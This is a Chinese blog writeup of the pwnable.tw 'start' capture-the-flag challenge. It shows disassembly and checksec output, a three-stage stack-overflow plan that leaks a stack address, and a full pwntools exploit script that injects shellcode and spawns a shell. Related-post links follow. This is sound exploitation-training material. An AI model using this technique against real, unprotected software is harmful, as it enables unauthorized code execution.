pwnable.tw start writeup

最新推荐文章于 2023-09-22 09:54:04 发布
最新推荐文章于 2023-09-22 09:54:04 发布
阅读量1.4k 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29343201/article/details/78108543
版权

题目

.text:08048060
.text:08048060                 public _start
.text:08048060 _start          proc near
.text:08048060                 push    esp
.text:08048061                 push    offset _exit
.text:08048066                 xor     eax, eax
.text:08048068                 xor     ebx, ebx
.text:0804806A                 xor     ecx, ecx
.text:0804806C                 xor     edx, edx
.text:0804806E                 push    3A465443h
.text:08048073                 push    20656874h
.text:08048078                 push    20747261h
.text:0804807D                 push    74732073h
.text:08048082                 push    2774654Ch
.text:08048087                 mov     ecx, esp        ; addr
.text:08048089                 mov     dl, 14h         ; len
.text:0804808B                 mov     bl, 1           ; fd
.text:0804808D                 mov     al, 4
.text:0804808F                 int     80h             ; LINUX - sys_write
.text:08048091                 xor     ebx, ebx
.text:08048093                 mov     dl, 3Ch
.text:08048095                 mov     al, 3
.text:08048097                 int     80h             ; LINUX -
.text:08048099                 add     esp, 14h
.text:0804809C                 retn

输入位置直接就在栈上返回地址开始的位置
checksec

[*] '/pwn/start/start'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

什么保护都没开

分析

漏洞根本不用找,直接用就行,利用的时候主要问题在于不能直接ROP,也没法直接输入shellcode,因为输入位置在栈上,没有栈地址也没法用。

于是我使用的利用思路:
1. 泄露栈地址,通过控制执行流之后跳到0x804808b的位置,len这个时候是大于0x14的,于是可以泄露出栈地址,并且之后可以在进行一次读,于是继续控制执行流
2. 第二次控制执行流,写入一阶段shellcode,并且设置rop-chain,先进行一阶段shellcode,之后回到0x8048095进行第三次控制执行流,这里的原因是写入shellcode的空间不够,所以通过分阶段来扩大控制能力。 一阶段shellcode只需要改大dl,也就是读的大小
3. 第三次控制执行流,由于dl已经改大,我们可以输入更大的大小,于是先sub esp, 0x100开辟栈空间,否则栈空间与执行位置重合(其实之前的所有操作都是因为我不想自己写shellcode,想直接用pwntools的shellcode,而它的shellcode会用到栈,于是进行了一系列操作。。),然后再执行pwntools的shellcode即可

exp

exp中的各种偏移都是调试时候的内容,由于每次调试的绝对位置不一样,可能数据看起来有些奇怪,不过不是很影响

import sys
from pwn import *
context(os='linux', arch='i386', log_level='debug')

GDB = 1
if len(sys.argv) > 2:
    p = remote(sys.argv[1], int(sys.argv[2]))
else:
    p = process("./start")

def main():
    if GDB:
        raw_input()
    payload = p32(0x804808b) # write
    p.recvuntil('CTF:')
    payload = payload.rjust(0x14 + 4, '\x00')
    p.send(payload)

    raw_input()

    leak = u32(p.recv(0x18 + 4)[-4:]) # b0
    shellcode1_addr = leak - (0xa0 - 0xb8)
    shellcode2_addr = leak - (0x310 - 0x33c + 4) + 8
    shellcode = asm(
        '''
        mov dl, 0xff
        ret
        '''
    )

    payload = ""
    payload = payload.ljust(0x30 - 0x04, '\x90')
    assert len(payload) == 0x30 - 0x04
    payload += p32(shellcode1_addr)
    payload += p32(0x8048095)
    payload += shellcode
    p.send(payload)

    raw_input()

    payload = ""
    payload = payload.ljust(0xf5c - 0xf14, '\x00')
    payload += p32(shellcode2_addr)
    payload += asm("""
        sub esp, 0x100
    """)
    payload += asm(shellcraft.sh())
    p.send(payload)
    raw_input()
    p.interactive()


if __name__ == "__main__":
    main()
Anciety
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
pwntw start writeup 栈溢出利用自身代码
ditto的博客
12-22 634
这题利用了栈溢出,将返回地址覆盖为程序本身地址,造成内存泄露。 有个坑是如果你用gdb peda自带的checksec检查防护措施会发现NX是打开的,那么堆栈处的代码无法执行,就无法构造栈里的shellcode,file下 发现程序是静态链接的,那就无法利用ret2libc。想了半天也不知道怎么做。就用ubuntu自带的checksec检查下发现 根本没有开启NX,可能是gdb的调试环境会影响...
PWN uaf [pwnable.kr]CTF writeup题解系列13
重新启程
01-02 685
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 题目都已经介绍了这是一道Use After Free的题目,那我们就不用多想了,先看看题目主要内容 root@mypwn:/ctf/work/pwnable.kr# ssh uaf@pwnable.kr -p2222 uaf@pwnable.kr's password: ____ __...
PWN unlink [pwnable.kr]CTF writeup题解系列14(包含本地解决方法)
重新启程
01-06 684
先看看题目内容: 这个题目是比较经典的unlink题目,网上已经有很多wp介绍了做法,我这里就不多阐述,只是把我对在不同操作系统版本下的理解和大家说一下。 我先把服务器的操作系统相关组件的版本和我自己本机用的docker的操作系统相关组件的版本信息列举一下: pwnable.kr # Linux prowl 4.4.179-0404179-generic #20190427043...
pwnable.tw】start
qq_61670993的博客
09-22 70
对栈布局的分析
pwnable.tw【start】
weixin_51055545的博客
04-22 336
检查程序 任何保护都没开, 放到IDA中分析: 逆向分析 很简单的一个程序,只有start和exit两个函数,通过分析汇编,我们知道,程序先write出欢迎的语句,然后系统调用read(),来让我们输入,我们输入的栈上是可读可写可执行的,所以我们leak出stack地址,然后控制程序返回到我们构造好的shellcode即可, 思路 1.通过构造write()来leak出栈地址 2.通过控制返回地址,来执行我们的shellcode,从而达到getshell的目的. exp分析: io.recvuntil(
Writeup.rar
12-01
Writeup.rar
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
2020YCBCTF羊城杯官方Writeup.pdf
10-28
2020YCBCTF羊城杯官方Writeup.pdf
2023 强网杯 Writeup
最新发布
01-29
2023 强网杯 Writeup
CTF_Competitions_Writeup:周大福比赛作品集
04-13
CTF_Competitions_Writeup 这是我解决的一些CTF竞赛挑战文章的集合。
pwnable.tw--->start 01
程序员晓老九
10-18 173
pwnable.tw 01 前提--->链接 PWNABLE.TW 02 Challenges 01 start IDA似乎看不出啥来 扔到peda里反汇编看一看,因为是x86(file可知),先写再读。 就知道这么点信息,没啥头绪,猜测是shellcode解。 write的长度是0x14,read的长度是0x3c,明显读的比写的长 覆盖_exit的offset是20,两种方法 1 在_start的ret处下断点--->到退出是20,32位对...
pwnable.tw writeup
钞sir的博客
02-27 4042
start 这道题是静态编译的,或者可以理解是就是直接用汇编写的,所以这个程序很小,没有可以利用的函数; sir@sir-PC:~/desktop$ objdump -R start start: 文件格式 elf32-i386 objdump: start:不是动态对象 objdump: start: 无效的操作 反汇编代码: sir@sir-PC:~/desktop$ objdu...
Pwnable.tw orw [Writeup]
柷敔的博客
02-18 515
题源 https://pwnable.tw/challenge/#2 题解 先看一下安全保护情况 再IDA一下源码 其中seccomp是一个开启内核system call保护的函数。通过这一函数可以划定程序准许用户态调用的系统函数,相当于划定白名单,即题目所言【仅开启了open、write、read】。 简单分析函数可知,该程序直接执行了用户输入的shellcode。结合题目意思,可以使用open函数打开flag文件,然后read读出文件内容,最后write输出到控制台。 使用的python程序如下:
【PWN刷题】Pwnable-Start、Pwnable-orw
QYbudong的博客
05-03 879
③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。入门级题目,保护全关。
pwnable start
m0_57754423的博客
01-25 1703
如果有什么不懂的地方,可以在评论区评论哦,看到就会回答的。 拿到附件以后 checksec一下: 32位程序 没有开启任何保护,放入ida中看一下,只有两个函数_start和_exit,这个题目的源码就不是C代码,本身就是汇编代码,: 我们看汇编代码: 大概流程就是 先压栈esp和exit函数地址,然后压栈字符串,我们可以先运行一下这个程序: 中间的五次push应该就是压入的这些字符串。 随后 write系统调用 打印这些字符串,然后 read系统调用 让用户写入数据 write
关于BUUCTF之“pwnable_start”的一点小结
Probeginner的博客
12-07 276
之前这个用汇编代码编写shellcode的题目做的较少,这题算是开端。 正常检查程序保护,啥也没开。 我们先分析一波程序: 需要用到一点汇编知识,总的意思是:四个xor清零四个寄存器。而后压栈数据,是最开始会输出的“Let’s start the CTF:”然后调用write函数输出上面内容0x14个字节。而后调用read函数输入最大0x3c字节内容。在add esp ;然后返回。 我们选择shellcode在栈上执行办法。所以我们需要泄露栈地址,计算偏移量,覆盖返回地址为shellcode所在地址 .
pwnable.tw-start
qq_35661990的博客
10-05 898
参考了好多文章才能大致理解shellcode 这题开始就有一个大坑 可以看到不同的checksec查看start文件会有不同的结果,就结果而言,GDB-PEDA的checksec很不靠谱。。我根本没有s命名的文件。。 所以,start是一个32位没有开启NX的程序,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行...
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4148
记第一篇pwn的做题心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的题,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值